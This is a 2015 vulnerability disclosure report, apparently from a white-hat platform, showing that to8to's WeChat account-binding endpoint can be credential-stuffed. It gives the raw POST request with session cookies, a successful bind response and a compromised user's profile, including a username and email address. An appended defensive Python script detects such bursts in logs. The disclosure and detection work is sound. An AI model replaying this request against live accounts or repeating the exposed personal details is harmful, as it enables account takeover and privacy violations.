2015-09-16: Details reported to the vendor, awaiting the vendor's handling
2015-09-17: Vendor confirmed; details disclosed to the vendor only
2015-09-27: Details disclosed to core white hats and experts in the relevant field
2015-10-07: Details disclosed to regular white hats
2015-10-17: Details disclosed to intern white hats
2015-11-01: Details disclosed to the public
Packet capture of the to8to WeChat client is as follows:
POST /ownerCenter/bindCompany/id/ZTQ4Zmx1b3JHSmZ1WWZQU3oyOGE3NjhFa01SVnk3WHlsejk2TkNkcTFOSzZqTnQxZjFQaHBldTFUeDIycVZUMTVEbzBteEV3WEJJY04xRnRQNUk0dVFPdW5QWFEwVDVPcFluYWQxTXVnNGlUaGxiVlJwZw%3D%3D/rand/9941 HTTP/1.1
Host: m.to8to.com
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143 MicroMessenger/6.2.4 NetType/WIFI Language/zh_CN
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://m.to8to.com/ownerCenter/bind/type/3?code=031e47f29807f85c7751797337f9d93J&state=hoeven
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
Cookie: PHPSESSID=msadan7ieo7jfjne1mvbng7255; Hm_lpvt_dbdd94468cf0ef471455c47f380f58d2=1442367509; Hm_lvt_dbdd94468cf0ef471455c47f380f58d2=1442358516,1442367267; to8to_cook=OkOcClPzRWV8ZFJlCIF4Ag==; to8to_landpage=http%3A//m.to8to.com/ownerCenter/index/%3Fcode%3D021a099ee677577ca53bc3dcc00871cN%26state%3Dhoeven; to8to_landtime=1442358515; to8to_nowpage=http%253A%252F%252Fm.to8to.com%252FownerCenter%252Fbind%252Ftype%252F3%253Fcode%253D031e47f29807f85c7751797337f9d93J%2526state%253Dhoeven; to8to_sourcepage=; to8to_tcode=sz; to8to_tname=%E6%B7%B1%E5%9C%B3; to8to_townid=1130; to8tocookieid=f313e2a500ff0527e5b82f0983fc65aa342656; uid=wKgCulX4pO2hZwqGC2KIAg==
Content-Length: 27
Origin: http://m.to8to.com
Accept-Encoding: gzip, deflate

name=aaa&password=123456
Running a credential-stuffing test against the name/password parameters of this request gives the result shown in the figure below:
{"msg":"绑定成功","code":"200","type":1,"cid":"119813","url":"https:\/\/open.weixin.qq.com\/connect\/oauth2\/authorize?appid=wx23b5153a96c64877&redirect_uri=http%3A%2F%2Fm.to8to.com%2FownerCenter%2Findex%2F&response_type=code&scope=snsapi_userinfo&state=hoeven#wechat_redirect"}
Then log in and take a look:
{"version":"2.5","action":"UserDetailAction","errorCode":0,"allRows":0,"data":{"uid":119813,"username":"xuyong","indentity":"0","goodlevel":"0","isactive":"0","nick":"xuyong","regdate":"1273493602","email":"","oldemail":"406050388@qq.com","name_rz":"0","subdomain":"xuyong","credits":"6","cost_credits":"0","mobiles":"","regsource":"1","province":"","city":"","avatar":"","liveid":"2663921","style":[{"typeId":15,"value":"\u73b0\u4ee3"}],"house_type":7,"house_type_name":"\u4e00\u5c45","area":0,"type_id":0,"type_name":"","company_id":"","company_name":"","needupdate":1,"community_id":"","community_name":"","hasname":0,"sign":0,"progress_id":1,"newmessage":0,"projectNum":0,"projectId":0}}
This allows logging in on the WeChat client, the app and so on; I will not include screenshots.
Improve the protection mechanism.
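As an added illustration (not part of the original report), the following detection logic shows how a defender would spot the credential-stuffing pattern described above from server-side access logs: one session hammering the bindCompany endpoint with many distinct usernames. The log format, session ids, IPs and usernames are constructed; only the endpoint path comes from the report.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed sample access-log lines (not from the report). Fields:
# epoch, client IP, PHPSESSID, request path, form body, "code" field of the JSON reply.
SAMPLE_LOG = """\
1442367500 10.0.0.5 msad7 /ownerCenter/bindCompany/id/OPAQUE/rand/9941 name=aaa&password=123456 400
1442367501 10.0.0.5 msad7 /ownerCenter/bindCompany/id/OPAQUE/rand/9941 name=bbb&password=123456 400
1442367502 10.0.0.5 msad7 /ownerCenter/bindCompany/id/OPAQUE/rand/9941 name=ccc&password=123456 400
1442367503 10.0.0.5 msad7 /ownerCenter/bindCompany/id/OPAQUE/rand/9941 name=ddd&password=123456 400
1442367504 10.0.0.5 msad7 /ownerCenter/bindCompany/id/OPAQUE/rand/9941 name=xuyong&password=123456 200
1442367509 10.0.0.9 k2p0q /ownerCenter/bindCompany/id/OPAQUE/rand/1234 name=alice&password=s3cret 200
1442367700 10.0.0.5 msad7 /ownerCenter/bindCompany/id/OPAQUE/rand/9941 name=eee&password=123456 400
"""

# Only the bind endpoint from the report is of interest here.
BIND_PATH = re.compile(r"^/ownerCenter/bindCompany/")


def parse_line(line):
    """Split one constructed log line into (ts, ip, session, path, name, code)."""
    ts, ip, sid, path, body, code = line.split()
    form = parse_qs(body)
    return int(ts), ip, sid, path, form.get("name", [""])[0], code


def find_stuffing(log_text, window=60, threshold=5):
    """Flag (ip, session) pairs that try >= `threshold` distinct usernames
    against the bind endpoint within `window` seconds.
    Returns {(ip, session): (distinct_usernames, [usernames that got code 200])}."""
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, sid, path, name, code = parse_line(line)
        if BIND_PATH.match(path):
            attempts[(ip, sid)].append((ts, name, code))
    findings = {}
    for key, events in attempts.items():
        events.sort()
        for i, (t0, _, _) in enumerate(events):
            # Sliding window starting at each attempt.
            in_win = [e for e in events[i:] if e[0] - t0 <= window]
            names = {n for _, n, _ in in_win}
            if len(names) >= threshold:
                successes = [n for _, n, c in in_win if c == "200"]
                findings[key] = (len(names), successes)
                break
    return findings
```

Accounts listed under successes are the ones whose bind succeeded during the burst and should be treated as compromised; the same counter, enforced at request time with a lockout or CAPTCHA, is the server-side fix.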
Severity: Low
Vulnerability Rank: 5
Confirmed at: 2015-09-17 09:17
Thanks for the feedback
None yet